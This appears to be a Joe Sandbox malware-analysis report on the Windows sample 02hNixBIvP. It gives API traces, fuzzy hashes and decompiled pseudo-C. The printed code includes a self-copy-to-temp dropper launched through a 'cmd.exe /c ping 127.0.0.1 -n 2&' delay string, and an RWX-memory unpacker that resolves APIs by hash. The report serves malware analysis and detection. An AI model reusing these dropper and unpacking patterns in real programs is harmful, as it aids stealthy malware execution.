0x00401240
0x00401243
0x0040124c
0x00401252
0x00401254
0x00401256
0x00401263
0x00401280
0x004012a0
0x004012a7
0x004012aa
0x004012b1
0x004012b7
0x004012ba
0x004012c5
0x004012c7
0x004012ca
0x004012cd
0x004012ee
0x004012f0
0x00401306
0x0040130a
0x0040131a
0x0040131f
0x00401328
0x00401330
0x00401342
0x00401348
0x0040134a
0x0040134c
0x00401358
0x0040135e
0x00401360
0x00401362
0x0040136b
0x00401373
0x00401374
0x00401393
0x004013a4
0x004013af
0x004013b3
0x00000000
0x00000000
0x00000000
0x004012cf
0x004012cf
0x004012cf
0x004012d5
0x004012dd
0x004012e2
0x004012e5
0x004012e9
0x004012e9
0x00000000
0x00000000
0x00000000
0x00000000
0x004011e2
0x004011e2
0x004011f1
0x004011f6
0x004011fb
0x004011fd
0x00000000

APIs

memset.MSVCRT ref: 004011B5
__p___argv.MSVCRT ref: 004011C4

Part of subcall function 004010DF: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040111A

__p___argv.MSVCRT ref: 004011E6

Part of subcall function 004010DF: memset.MSVCRT ref: 00401141
Part of subcall function 004010DF: ReadFile.KERNELBASE(?,?,00001000,?,00000000), ref: 00401159
Part of subcall function 004010DF: memcpy.MSVCRT ref: 00401174
Part of subcall function 004010DF: FindCloseChangeNotification.KERNELBASE(?), ref: 00401186

Sleep.KERNEL32(00000064), ref: 004011FB
GetTickCount.KERNEL32 ref: 00401233
GetTempPathA.KERNEL32(00000104,?), ref: 00401263
wsprintfA.USER32 ref: 00401280
CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 004012A0
time.MSVCRT ref: 004012AA
srand.MSVCRT ref: 004012B1
rand.MSVCRT ref: 004012CF
Sleep.KERNELBASE(00000064), ref: 004012F0
WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00401306
Sleep.KERNELBASE(00000064), ref: 0040130A
WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 0040131A
FindCloseChangeNotification.KERNELBASE(?), ref: 0040131F
__p___argv.MSVCRT ref: 00401363
_mbscpy.MSVCRT ref: 00401374
wsprintfA.USER32 ref: 00401393
WinExec.KERNEL32(?,00000000), ref: 004013A4
Sleep.KERNELBASE(000001F4), ref: 004013AF
ExitProcess.KERNEL32 ref: 004013B3

Strings

cmd.exe /c ping 127.0.0.1 -n 2&%s "%s", xrefs: 0040138D
%s\%s.exe, xrefs: 0040127A

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: File$Sleep$__p___argv$ChangeCloseCreateFindNotificationWritememsetwsprintf$CountExecExitPathProcessReadTempTick_mbscpymemcpyrandsrandtime
String ID: %s\%s.exe$cmd.exe /c ping 127.0.0.1 -n 2&%s "%s"
API String ID: 3742635431-2816570591
Opcode ID: 7c0aa4d6032f19efc6f0574d2b02c73672e5a55c5a30703d20692792e0339aea
Instruction ID: d2297b8266ecacfc823cd110b5f5006d7f60a8736864fb2ea4bbb2a36b220300
Opcode Fuzzy Hash: 7c0aa4d6032f19efc6f0574d2b02c73672e5a55c5a30703d20692792e0339aea
Instruction Fuzzy Hash: E8515B72D44209BFDB11ABE4CC89ADEBFB9EB48300F1044B6F204E6160DA795B44CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00415410 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E00415410(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				char _v100;
				char _v104;
				int _v108;
				char _v112;
				char _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t27;
				char _t29;
				intOrPtr* _t35;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				void* _t56;
				intOrPtr _t58;
				intOrPtr _t61;

				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				 *0x4172ec(2, __edi, __esi, __ebx,  *[fs:0x0], 0x415404, 0x419100, 0xffffffff, _t56);
				 *0x41cbe0 =  *0x41cbe0 | 0xffffffff;
				 *0x41cbe4 =  *0x41cbe4 | 0xffffffff;
				_t23 =  *0x4172f0();
				_t46 =  *0x41c9b8; // 0x0
				 *_t23 = _t46;
				_t24 =  *0x4172f4();
				_t47 =  *0x41c9b4; // 0x0
				 *_t24 = _t47;
				_t25 =  *0x4172fc; // 0x74896be4
				 *0x41cbdc =  *_t25;
				_t27 = E0041559B( *_t25);
				_t61 =  *0x41c8c8; // 0x1
				if(_t61 == 0) {
					_t27 =  *0x4172e4(E00415598);
				}
				E00415586(_t27);
				L00415580();
				_t29 =  *0x41c9b0; // 0x0
				_v112 = _t29;
				 *0x4172dc( &_v100,  &_v116,  &_v104,  *0x41c9ac,  &_v112, 0x41c028, 0x41c02c);
				_push(0x41c024);
				_push(0x41c000); // executed
				L00415580(); // executed
				_t35 =  *0x4172d8; // 0x74895b9c
				_t55 =  *_t35;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E004155C6(GetModuleHandleA(0), _t39, 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0041557A();
				return _t41;
			}

0x00415426
0x00415433
0x00415438
0x0041543d
0x00415444
0x0041544b
0x00415452
0x00415458
0x0041545e
0x00415460
0x00415466
0x0041546c
0x0041546e
0x00415475
0x0041547a
0x0041547f
0x00415485
0x0041548c
0x00415492
0x00415493
0x004154a2
0x004154a7
0x004154ac
0x004154c5
0x004154cb
0x004154d0
0x004154d5
0x004154dd
0x004154e2
0x004154e4
0x004154ea
0x00415526
0x0041552b
0x0041552c
0x0041552c
0x004154ec
0x004154ec
0x004154ec
0x004154ed
0x004154f0
0x004154f2
0x004154fd
0x004154ff
0x004154ff
0x00415500
0x00415500
0x004154fd
0x00415503
0x00415507
0x00000000
0x00000000
0x0041550d
0x00415514
0x0041551e
0x00415533
0x00415520
0x00415520
0x00415520
0x0041553f
0x00415544
0x00415548
0x0041554e
0x00415553
0x00415555
0x00415558
0x00415559
0x0041555a
0x00415561

APIs

__set_app_type.MSVCRT ref: 0041543D
__p__fmode.MSVCRT ref: 00415452
__p__commode.MSVCRT ref: 00415460
__setusermatherr.MSVCRT ref: 0041548C
_initterm.MSVCRT ref: 004154A2
__getmainargs.MSVCRT ref: 004154C5
_initterm.MSVCRT ref: 004154D5
GetStartupInfoA.KERNEL32(?), ref: 00415514
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00415538
exit.MSVCRT ref: 00415548
_XcptFilter.MSVCRT ref: 0041555A

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: dc342064fc473dd6211d3b0943abf782a1a2789885f7a3c13764eacea4c338bf
Instruction ID: c74af80d35e2c67a5f516f5a1d0bf5d206878bc3e350f766078b7051b9745e2e
Opcode Fuzzy Hash: dc342064fc473dd6211d3b0943abf782a1a2789885f7a3c13764eacea4c338bf
Instruction Fuzzy Hash: 4141ACB1984744EFDB20DFA4DC85AEA7BBAEB48710F20416BF441972A1C7785881CB18

Uniqueness

Uniqueness Score: -1.00%

Function 004010DF Relevance: 7.6, APIs: 5, Instructions: 67
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004010DF(void* __ecx, void* __eflags, intOrPtr _a4, long _a8, intOrPtr* _a12) {
				void* _v8;
				void _v4103;
				void _v4104;
				void* _t22;
				void* _t29;
				intOrPtr* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				E00415390(0x1004, __ecx);
				_v4104 = 0;
				memset( &_v4103, 0, 0x3ff << 2);
				_t47 = _t46 + 0xc;
				asm("stosw");
				asm("stosb"); // executed
				_t22 = CreateFileA(_a8, 0x80000000, 0, 0, 3, 0x80, 0); // executed
				_v8 = _t22;
				if(_t22 != 0xffffffff) {
					_t42 = _a12;
					while(1) {
						_a8 = 0;
						memset( &_v4104, 0, 0x1000);
						_t48 = _t47 + 0xc;
						ReadFile(_v8,  &_v4104, 0x1000,  &_a8, 0); // executed
						if(_a8 == 0) {
							break;
						}
						memcpy( *_t42 + _a4,  &_v4104, _a8);
						_t47 = _t48 + 0xc;
						 *_t42 =  *_t42 + _a8;
					}
					FindCloseChangeNotification(_v8); // executed
					_t29 = 1;
					return _t29;
				}
				return 0;
			}

0x004010e7
0x004010fd
0x00401104
0x00401104
0x0040110f
0x00401119
0x0040111a
0x00401123
0x00401126
0x0040112c
0x00401135
0x0040113e
0x00401141
0x00401146
0x00401159
0x00401162
0x00000000
0x00000000
0x00401174
0x0040117c
0x0040117f
0x0040117f
0x00401186
0x0040118e
0x00000000
0x0040118f
0x00000000

APIs

CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040111A
memset.MSVCRT ref: 00401141
ReadFile.KERNELBASE(?,?,00001000,?,00000000), ref: 00401159
memcpy.MSVCRT ref: 00401174
FindCloseChangeNotification.KERNELBASE(?), ref: 00401186

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationReadmemcpymemset
String ID:
API String ID: 4020786314-0
Opcode ID: 35d4516e9bf1672e33f3e385a2aa10f55f2dedffe401836ef089bc25eef59cc4
Instruction ID: b3c3ea1559986d33b90c3f3678d17a695d6118acee8a61d0ddd5dd874004b1bb
Opcode Fuzzy Hash: 35d4516e9bf1672e33f3e385a2aa10f55f2dedffe401836ef089bc25eef59cc4
Instruction Fuzzy Hash: 7C117F72900249BFDB128F58DC81BDA77ACEB08365F108076FB19E6190D2749B548B68

Uniqueness

Uniqueness Score: -1.00%

Function 004B5DAE Relevance: 5.2, APIs: 4, Instructions: 229
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E004B5DAE(intOrPtr _a32, char _a846, intOrPtr _a2801, intOrPtr _a2805, intOrPtr _a2809, intOrPtr _a2813, intOrPtr _a2817, intOrPtr _a2821, void* _a6897, void* _a6921, intOrPtr _a6929, intOrPtr _a6965, intOrPtr _a6977, char _a6981, char _a6992, char _a7034, char _a7074, char _a7131, intOrPtr _a8349, char _a8369, intOrPtr _a8546, intOrPtr _a9058, intOrPtr _a9791, signed int* _a9795, void* _a9799, char _a9803) {
				CHAR* _v16;
				intOrPtr* _v24;
				struct _STARTUPINFOA _v96;
				char _v100;
				char _v104;
				int _v108;
				char _v112;
				char _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t96;
				void* _t100;
				signed int* _t102;
				void* _t104;
				intOrPtr _t107;
				void* _t109;
				void* _t112;
				signed int* _t118;
				signed int _t120;
				void* _t121;
				char* _t122;
				signed int _t123;
				void* _t126;
				intOrPtr* _t132;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t136;
				char _t138;
				intOrPtr* _t144;
				intOrPtr _t145;
				signed int _t147;
				int _t149;
				intOrPtr* _t150;
				intOrPtr _t151;
				void* _t155;
				intOrPtr* _t156;
				intOrPtr* _t157;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t168;
				CHAR* _t175;
				signed int _t176;
				void* _t177;
				void* _t178;
				void* _t179;
				char* _t180;
				intOrPtr* _t181;
				intOrPtr* _t182;
				void* _t183;
				signed int* _t185;
				intOrPtr* _t186;
				intOrPtr _t188;
				intOrPtr* _t190;
				intOrPtr _t191;
				intOrPtr _t204;

				_t188 =  *_t190;
				_t191 = _t190 + 4;
				_t180 =  &_a9803;
				_t156 =  &_a846;
				_t175 = 0;
				E004B6059(0, _t180);
				_a6897 = VirtualAlloc(0, 0xc2000, 0x1000, 0x40);
				while( *((intOrPtr*)(_t175 + _t180)) != 0) {
					asm("pushad");
					_t96 =  *_t156( *((intOrPtr*)(_t175 + _t180 + 4)),  *((intOrPtr*)(_t175 + _t180)), _a6897);
					asm("popad");
					_t175 = _t175 + 8;
				}
				_t31 = _t180 + 4; // 0x4
				_t181 = _t175 + _t31;
				if(_a9058 != 1) {
					_t182 = _t181 + 8;
				} else {
					_t179 = 0;
					asm("pushad");
					while(1) {
						_t179 = _t179;
						if(_t179 != 0) {
							break;
						}
						_t156 =  *((intOrPtr*)(_t181 + 4));
						_t155 = E004B6041( *_t181, _t156);
						_push( &_a8369);
						if( *((intOrPtr*)(_t181 + 8)) != 0) {
							_push(0x40);
						} else {
							_push(0x20);
						}
						_t96 = _a2817(_t156, _t155);
						_t181 = _t181 + 0xc;
						if( *_t181 == 0xffffffff) {
							_t179 = _t179 + 1;
						}
					}
					_a32 = _t181 + 4;
					asm("popad");
					_t182 = _t96;
				}
				_a6929 =  *_t182;
				_t183 = _t182 + 4;
				E004B77E1(_t183);
				_a9799 = VirtualAlloc(0, 0xbbc, 0x1000, 0x40);
				_t157 = _t156;
				asm("pushad");
				_t100 =  *_t157(_a9799, _t183 + 4, _a6897);
				asm("popad");
				E004B7114(_t100);
				if(_a8546 != 0 && _a8349 != 0) {
					E004B73CF();
					E004B726C();
				}
				_t185 = _a9799;
				_t102 = _t185;
				while( *_t102 != 1) {
					_t102 =  &(_t102[0]);
				}
				_t176 = _t102[0];
				_t104 = E004B6025( &(_t102[0]), _t176);
				_t105 = _t104 + 4;
				_a9795 = _t104 + 4;
				while( *_t185 != 1) {
					E004B6920(_t105);
					_t107 = _a2821(_t185);
					if(_t107 == 0) {
						_t177 = 0;
						goto L64;
					} else {
						_a9791 = _t107;
						_t118 = _t185;
						L51:
						while( *_t118 != 0) {
							while(1) {
								_t120 =  *_a9795;
								if((_t120 & 0x80000000) == 0) {
									_push(_a9795);
								} else {
									_t123 = _t120 ^ 0x80000000;
									_push(_t123);
									_a6921 = _t123;
									 *_a9795 = 0x202020;
								}
								_t121 = _a2805(_a9791);
								if(_t121 == 0) {
									break;
								}
								_a6921 = 0;
								 *_t176 = _t121;
								_t176 = _t176 + 4;
								_t122 = _a9795;
								while( *_t122 != 0) {
									_t122 = _t122 + 1;
								}
								_t118 = _t122 + 1;
								_a9795 = _t118;
								if(( *_t118 & 0x80000000) != 0) {
									continue;
								} else {
									goto L51;
								}
								goto L75;
							}
							if(_a6921 != 0) {
								_t177 = 2;
							} else {
								_t177 = 1;
							}
							L64:
							_a9799 = _a2809(0, 0x1000, 0x1000, 0x40);
							_t109 = _a2801( &_a6981);
							_push(_t109);
							if(_a6965 == 0xabbc680d) {
								_push(_a6965);
								_push(_t109);
								_a6965 = E004B784E();
							}
							_pop(_t110);
							if(_a6977 == 0xea3af0d7) {
								_push(_a6977);
								_a6977 = E004B784E();
							}
							_t178 = _t177;
							if(_t178 != 0) {
								if(_t178 != 1) {
									if(_t178 == 2) {
										_a6977(_a9799,  &_a7131, _a6921, _t185);
									}
								} else {
									_a6977(_a9799,  &_a7074, _a9795, _t185);
								}
							} else {
								_a6977(_a9799,  &_a7034, _t185);
							}
							_a6965(0, _a9799,  &_a6992, 0x30);
							_t112 = _a2813(_a9799, 0x1000, 0x4000);
							asm("popad");
							return _t112;
							goto L75;
						}
						while( *_t185 != 0) {
							_t185 =  &(_t185[0]);
						}
						_t185 =  &(_t185[0]);
						_t176 = _t118[0];
						_t126 = E004B6025( &(_t118[0]), _t176);
						_t105 = _t126 + 4;
						_a9795 = _t126 + 4;
						continue;
					}
					L75:
				}
				VirtualFree(_a9799, 0xbbc, 0x4000);
				VirtualFree(_a6897, 0xc2000, 0x4000);
				E004B6088();
				asm("popad");
				 *[fs:0x0] = _t191;
				_v96.hStdOutput = _t191 - 0x68;
				_v16 = 0;
				 *0x4172ec(2, _t176, _t185, _t157,  *[fs:0x0], 0x415404, 0x419100, 0xffffffff, _t188);
				 *0x41cbe0 =  *0x41cbe0 | 0xffffffff;
				 *0x41cbe4 =  *0x41cbe4 | 0xffffffff;
				_t132 =  *0x4172f0();
				_t165 =  *0x41c9b8; // 0x0
				 *_t132 = _t165;
				_t133 =  *0x4172f4();
				_t166 =  *0x41c9b4; // 0x0
				 *_t133 = _t166;
				_t134 =  *0x4172fc; // 0x74896be4
				 *0x41cbdc =  *_t134;
				_t136 = E0041559B( *_t134);
				_t204 =  *0x41c8c8; // 0x1
				if(_t204 == 0) {
					_t136 =  *0x4172e4(E00415598);
				}
				E00415586(_t136);
				L00415580();
				_t138 =  *0x41c9b0; // 0x0
				_v112 = _t138;
				 *0x4172dc( &_v100,  &_v116,  &_v104,  *0x41c9ac,  &_v112, 0x41c028, 0x41c02c);
				_push(0x41c024);
				_push(0x41c000); // executed
				L00415580(); // executed
				_t144 =  *0x4172d8; // 0x74895b9c
				_t186 =  *_t144;
				_v120 = _t186;
				if( *_t186 != 0x22) {
					while( *_t186 > 0x20) {
						_t186 = _t186 + 1;
						_v120 = _t186;
					}
				} else {
					do {
						_t186 = _t186 + 1;
						_v120 = _t186;
						_t151 =  *_t186;
					} while (_t151 != 0 && _t151 != 0x22);
					if( *_t186 == 0x22) {
						L7:
						_t186 = _t186 + 1;
						_v120 = _t186;
					}
				}
				_t145 =  *_t186;
				if(_t145 != 0 && _t145 <= 0x20) {
					goto L7;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t147 = 0xa;
				} else {
					_t147 = _v96.wShowWindow & 0x0000ffff;
				}
				_t149 = E004155C6(GetModuleHandleA(0), _t148, 0, _t186, _t147);
				_v108 = _t149;
				exit(_t149);
				_t150 = _v24;
				_t168 =  *((intOrPtr*)( *_t150));
				_v124 = _t168;
				_push(_t150);
				_push(_t168);
				L0041557A();
				return _t150;
				goto L75;
			}

0x004b5dae
0x004b5db1
0x004b5dbe
0x004b5dc4
0x004b5dca
0x004b5dcc
0x004b5dea
0x004b5e0b
0x004b5df7
0x004b5e05
0x004b5e07
0x004b5e08
0x004b5e08
0x004b5e11
0x004b5e11
0x004b5e1c
0x004b5e62
0x004b5e1e
0x004b5e1e
0x004b5e20
0x004b5e52
0x004b5e52
0x004b5e54
0x00000000
0x00000000
0x004b5e25
0x004b5e2b
0x004b5e36
0x004b5e39
0x004b5e3f
0x004b5e3b
0x004b5e3b
0x004b5e3b
0x004b5e43
0x004b5e49
0x004b5e4f
0x004b5e51
0x004b5e51
0x004b5e4f
0x004b5e59
0x004b5e5d
0x004b5e5e
0x004b5e5e
0x004b5e67
0x004b5e6d
0x004b5e70
0x004b5e8d
0x004b5e93
0x004b5e94
0x004b5ea2
0x004b5ea4
0x004b5eaa
0x004b5eb6
0x004b5ec1
0x004b5ec6
0x004b5ec6
0x004b5ecb
0x004b5ed1
0x004b5ed6
0x004b5ed5
0x004b5ed5
0x004b5edc
0x004b5ede
0x004b5ee3
0x004b5ee6
0x004b5fa2
0x004b5ef1
0x004b5ef7
0x004b5eff
0x004b695b
0x00000000
0x004b5f05
0x004b5f05
0x004b5f0b
0x00000000
0x004b5f83
0x004b5f0f
0x004b5f15
0x004b5f1c
0x004b5f38
0x004b5f1e
0x004b5f1e
0x004b5f23
0x004b5f24
0x004b5f30
0x004b5f30
0x004b5f44
0x004b5f4c
0x00000000
0x00000000
0x004b5f57
0x004b5f61
0x004b5f63
0x004b5f66
0x004b5f6f
0x004b5f6e
0x004b5f6e
0x004b5f74
0x004b5f75
0x004b5f81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004b5f81
0x004b694b
0x004b6954
0x004b694d
0x004b694d
0x004b694d
0x004b695d
0x004b6971
0x004b697e
0x004b6984
0x004b698f
0x004b6991
0x004b6997
0x004b699d
0x004b699d
0x004b69a3
0x004b69ae
0x004b69b0
0x004b69bc
0x004b69bc
0x004b69c2
0x004b69c4
0x004b69e2
0x004b6a06
0x004b6a1c
0x004b6a22
0x004b69e4
0x004b69f8
0x004b69fe
0x004b69c6
0x004b69d4
0x004b69da
0x004b6a36
0x004b6a4c
0x004b6a52
0x004b6a53
0x00000000
0x004b6a53
0x004b5f8b
0x004b5f8a
0x004b5f8a
0x004b5f90
0x004b5f92
0x004b5f94
0x004b5f99
0x004b5f9c
0x00000000
0x004b5f9c
0x00000000
0x004b5eff
0x004b5fbb
0x004b5fd1
0x004b5fdc
0x004b5fe1
0x00415426
0x00415433
0x00415438
0x0041543d
0x00415444
0x0041544b
0x00415452
0x00415458
0x0041545e
0x00415460
0x00415466
0x0041546c
0x0041546e
0x00415475
0x0041547a
0x0041547f
0x00415485
0x0041548c
0x00415492
0x00415493
0x004154a2
0x004154a7
0x004154ac
0x004154c5
0x004154cb
0x004154d0
0x004154d5
0x004154dd
0x004154e2
0x004154e4
0x004154ea
0x00415526
0x0041552b
0x0041552c
0x0041552c
0x004154ec
0x004154ec
0x004154ec
0x004154ed
0x004154f0
0x004154f2
0x004154fd
0x004154ff
0x004154ff
0x00415500
0x00415500
0x004154fd
0x00415503
0x00415507
0x00000000
0x00000000
0x0041550d
0x00415514
0x0041551e
0x00415533
0x00415520
0x00415520
0x00415520
0x0041553f
0x00415544
0x00415548
0x0041554e
0x00415553
0x00415555
0x00415558
0x00415559
0x0041555a
0x00415561
0x00000000

APIs

VirtualAlloc.KERNELBASE(00000000,000C2000,00001000,00000040), ref: 004B5DE4
VirtualAlloc.KERNELBASE(00000000,00000BBC,00001000,00000040,?), ref: 004B5E87
VirtualFree.KERNELBASE(?,00000BBC,00004000), ref: 004B5FBB
VirtualFree.KERNELBASE(?,000C2000,00004000), ref: 004B5FD1

Memory Dump Source

Source File: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: ab74742cb4fde76f7cddec908db20751c27099f300f7c53e83f3c01ce56dee9b
Instruction ID: 24e4992b9d6948e21e8e4bedf5f1e11d57e5dbc52c2922d56559ceabe911fcce
Opcode Fuzzy Hash: ab74742cb4fde76f7cddec908db20751c27099f300f7c53e83f3c01ce56dee9b
Instruction Fuzzy Hash: 0691E471944689EFEF31AF60CC09BEABB65EF05300F210016F94E5A291D3B95B51DB2A

Uniqueness

Uniqueness Score: -1.00%

Function 00401703 Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E00401703(void* __ecx) {
				void* _t28;
				void* _t30;

				L004153D0();
				_t28 = __ecx;
				_push(0);
				L00415208();
				L00415202();
				if( *((intOrPtr*)( *((intOrPtr*)( *0x417284())) + 4)) == 0) {
					E00401194(); // executed
				}
				if(E004013BC() != 0) {
					ExitProcess(0xffffffff);
				}
				_push(0);
				E00401831(_t30 - 0x90);
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				 *((intOrPtr*)(_t28 + 0x20)) = _t30 - 0x90;
				L004151FC();
				 *(_t30 - 4) =  *(_t30 - 4) | 0xffffffff;
				E0040178C(_t30 - 0x90);
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return 0;
			}

0x00401708
0x00401714
0x00401716
0x00401718
0x00401720
0x00401731
0x00401733
0x00401733
0x0040173f
0x00401743
0x00401743
0x00401749
0x00401751
0x00401756
0x00401766
0x00401769
0x0040176e
0x00401778
0x00401783
0x0040178b

APIs

_EH_prolog.MSVCRT ref: 00401708
__p___argv.MSVCRT ref: 00401725
ExitProcess.KERNEL32 ref: 00401743

Part of subcall function 00401194: memset.MSVCRT ref: 004011B5
Part of subcall function 00401194: __p___argv.MSVCRT ref: 004011C4
Part of subcall function 00401194: __p___argv.MSVCRT ref: 004011E6
Part of subcall function 00401194: Sleep.KERNEL32(00000064), ref: 004011FB
Part of subcall function 00401194: GetTickCount.KERNEL32 ref: 00401233
Part of subcall function 00401194: GetTempPathA.KERNEL32(00000104,?), ref: 00401263
Part of subcall function 00401194: wsprintfA.USER32 ref: 00401280
Part of subcall function 00401194: CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 004012A0
Part of subcall function 00401194: time.MSVCRT ref: 004012AA

Part of subcall function 00401831: _EH_prolog.MSVCRT ref: 00401836
Part of subcall function 00401831: LoadIconA.USER32(00000000,00000080), ref: 004018D8

Part of subcall function 0040178C: _EH_prolog.MSVCRT ref: 00401791

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: H_prolog__p___argv$CountCreateExitFileIconLoadPathProcessSleepTempTickmemsettimewsprintf
String ID:
API String ID: 3574655727-0
Opcode ID: 0ace9a3c71477d23a19550cb91febc7830957eadbbfee540fdc6343e424ed2c1
Instruction ID: d643b5abc61cb50e4851cccbfb1eddeb9cb1e70d3b45357e864f9708fc649bd8
Opcode Fuzzy Hash: 0ace9a3c71477d23a19550cb91febc7830957eadbbfee540fdc6343e424ed2c1
Instruction Fuzzy Hash: 08016D31910514CFDB24FB75C80ABDCB7B4BF44318F4042AEA425A35E2EB789A44CA59

Uniqueness

Uniqueness Score: -1.00%

Function 00415340 Relevance: 3.0, APIs: 2, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_onexit.KERNELBASE ref: 0041534D
__dllonexit.MSVCRT ref: 00415363

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: __dllonexit_onexit
String ID:
API String ID: 2384194067-0
Opcode ID: 0692d2618b5d768e1866788beeb27d60625449e7663a897e878aae36d8e0dfc9
Instruction ID: 98d401c415d6678ea52b1c0f42600251c3288c2a67878add2b384861b0e27a05
Opcode Fuzzy Hash: 0692d2618b5d768e1866788beeb27d60625449e7663a897e878aae36d8e0dfc9
Instruction Fuzzy Hash: 8CC0123168D600FBCA005710BD47ACA3B22A790F76B6482ABF465D40F0D77D7450B90D

Uniqueness

Uniqueness Score: -1.00%

Function 004B7114 Relevance: 1.5, APIs: 1, Instructions: 21
libraryCOMMON

Download Yara Rule

Control-flow Graph

